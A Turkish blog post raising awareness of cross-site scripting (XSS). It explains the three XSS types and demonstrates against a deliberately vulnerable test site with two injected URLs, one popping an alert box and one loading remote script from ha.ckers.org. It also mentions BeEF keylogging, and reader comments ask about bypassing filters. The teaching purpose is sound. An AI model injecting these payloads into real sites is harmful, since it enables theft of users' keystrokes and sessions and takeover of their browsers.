XSS != Basit Bir Kutucuk

Bu zamana dek cross-site scripting ile ilgili çok sayıda makale, hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halen web uygulamalarında en çok rastlanan güvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben de birşeyler karalamak istedim.

Cross-site scripting, nam-ı diğer XSS ve Türkçe meali ile siteler arası betik çalıştırma zafiyeti ile ilgili son kullanıcı olarak bugüne dek çok fazla haber duydunuz, yazılımcı veya yönetici olarak çok sayıda XSS yazan bir kutucuk gördünüz ve bu nedenle XSS zafiyetinin uygulama üzerinde zararsız, küçük bir kutucuk çıkarmaktan ibaret olduğunu düşünebilirsiniz ancak gerçekler bir kutucuk ile sınırlı değil.


Siteler arası betik çalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (çoğunlukla javascript) filtrelemeden kullanıcıya sunması sonucunda ortaya çıkmaktadır.

Siteler arası betik çalıştırma zafiyeti üçe ayrılmaktadır;

  • Kalıcı (persistent/stored): Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktan sonra daha sonra içeriğin internet tarayıcısı tarafından her çağrılmasında (örnek olarak foruma yazılmış bir mesajı veya bir haberin altına yazılan bir yorumu düşünün) tekrar ve tekrar kullanıcıya sunulur.
  • Kalıcı olmayan (non-persistent/reflected): Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına yazılmadığı için sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı üzerinden size gönderilmiş bir bağlantı adresine (URL) tıkladığınızı düşünün) çağrılması ile kullanıcıya sunulur.
  • DOM tabanlı: İstemci tarafında bulunan kodun (javascript), DOM’a (Document Object Model/Belge Nesne Yapısıdır) müdahale etmesiyle ortaya çıkmaktadır. DOM tabanlı XSS’in en güzel yanı istemci tarafında olduğu için sunucuya herhangi bir paket gönderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi mümkün olmaz.

XSS zafiyetinin sadece kutucuk çıkartarak, çerez (cookie) çalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğine dair en güzel örneği Apache’nin geçen sene başına gelenlerden öğrenebilirsiniz. 2010 yılında art niyetli kişiler tarafından Apache sunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunucularda root yetkisine sahip olmaları ile son buldu. Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylı bilgiye buradan ulaşabilirsiniz.

XSS zafiyeti ile ilgili bir örnek üzerinden geçmezsek anlaşılması güç olacağı için ufak bir örnek üzerinden hızlıca ilerleyelim.

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesinin aratılması sonucunda sunucu tarafından dönen yanıtı göreceksiniz. Uygulama tarafında tfSearch parametresinde girdi kontrolü (kötü karakter filtrelemesi) yapılmadığı için XSS zafiyetine yol açmaktadır.

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır):

http://testasp.vulnweb.com/Search.asp?tfSearch=Mert

XSS zafiyetini istismar ederek kullanım #1 (alarm kutucuğu):

http://testasp.vulnweb.com/Search.asp?tfSearch=<script>alert('XSS');</script>

XSS zafiyetini istismar ederek kullanım #2 (başka bir siteden zararlı javascript kodu çağırma):

http://testasp.vulnweb.com/Search.asp?tfSearch=<script SRC=http://ha.ckers.org/xss.js></script>

Unutmayın, XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu çağırmanızı sağlayan art niyetli kişiler, internet tarayıcınızı uzaktan yöneterek tüm tuş kayıtlarınızı izleyebilir, ziyaret ettiğiniz siteleri tespit edebilir, Metasploit ile internet tarayıcınızın zafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin yönetim sayfasındaki CSRF zafiyetini istismar ederek yönetici şifrenizi değiştirerek modeminizi kontrol edebilir.

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini gösteren videoyu şiddetle izlemenizi tavsiye ederim.

Askere gitmeden önce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese güvenli günler dilerim.

image_pdfShow this post in PDF formatimage_printPrint this page
12 comments
  1. günlerdir xss üzerinde çalışıyorum ama fazla bir ilerleme kaydedemedim. Lüftfen aba yardım edin: Sorun şu: Ben bir sieye veri girebiliyorum o sitenin database sine veri gönderebiliyorum ama onun koyduğu sınırlar içerisinde yazabiliyorum verileri, Aceba bu verileri istediğim gibi yazabilmem mümkün mü?

  2. Merhaba,
    BEEF ile remote web browser hack oluyor mu ki? Benim bildiğim yalnızca local ağ da bulunan makinalar için geçerli bir araç. Yanılıyorsam lütfen düzeltin. Selamlar.

  3. merhaba ben xss e merak saldım ama pek bi ilerleme kaydedemedim.xss e nasıl çalışılır, xss için neler bilmek gereklidir,xss bypass yolları nasıl bulunur bu konularda bana yardımcı olup yol gösterebilr misiniz?

  4. Hocam bir süredir başka bir projeyle uğraştığım için gösterdiğiniz siteye biraz geçde olsa baktım bir çok araştırma yaptım genel olarak anladım gibi ama tek bi sorun var ovasp sitesinde bir çok filtre gösteriyor bunlar dışında bir aşma yolunu nasıl yaparız.Yani sonuçta orada yazdığına göre bunlar bilinen şeyler yine bi yol gösterebilirseniz çok sevinirim.

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like
Read More

e-Devlet Hacklendi mi?

If you are looking for an English version of this article, please visit here. Öncelikle yazının sonunda söyleyeceğimi başta söyleyeyim, “Hayır, hack-len-me-di!” Peki bu durumda vatandaş olarak rahat bir nefes alabilir misiniz ? Maalesef hayır. Bunun sebebini de yazının devamında okuyabilirsiniz. Zaman zaman hortlayan “e-Devlet Hacklendi!”, “e-Devlet verileri çalındı!”, “85…
Read More
Read More

WhatsApp Dolandırıcıları

If you are looking for an English version of this article, please visit here. Başlangıç Son günlerde hemen hemen WhatsApp uygulaması kullanan herkesi rahatsız eden yabancı cep telefonu numaralarından gelen çağrılardan, mesajlardan ben de yakın zamanda nasibimi aldım ve tabii ki diğer dolandırıcılıklarla ilgili yazılarımda (Kripto Para Dolandırıcıları, LinkedIn Dolandırıcıları,…
Read More
Read More

LinkedIn Dolandırıcıları

If you are looking for an English version of this article, please visit here. Uzun yıllardan beri sosyal ağları ve medyayı etkin kullanan bir siber güvenlik araştırmacısı olarak bağlantılarım arasında yer alanlarınız özellikle hafta içi LinkedIn ve Twitter üzerinden okuduğum ve beğendiğim siber güvenlik makalelerini, haberleri paylaştıklarımı farkediyorlardır. Twitter hesabımın…
Read More
Read More

Profilime Kim Baktı?

If you are looking for an English version of this article, please visit here. 23 Eylül 2020 tarihinde Twitter’da siber güvenlik ile ilgili haberlere göz gezdirirken gündem olan başlıklarda #profilimekimbaktı etiketi dikkatimi çekti. Beni oldukça şüphelendiren bu etiketin gündem olmasının arkasında yatan sebebi bulmak için bu etiketi paylaşan hesaplara göz…
Read More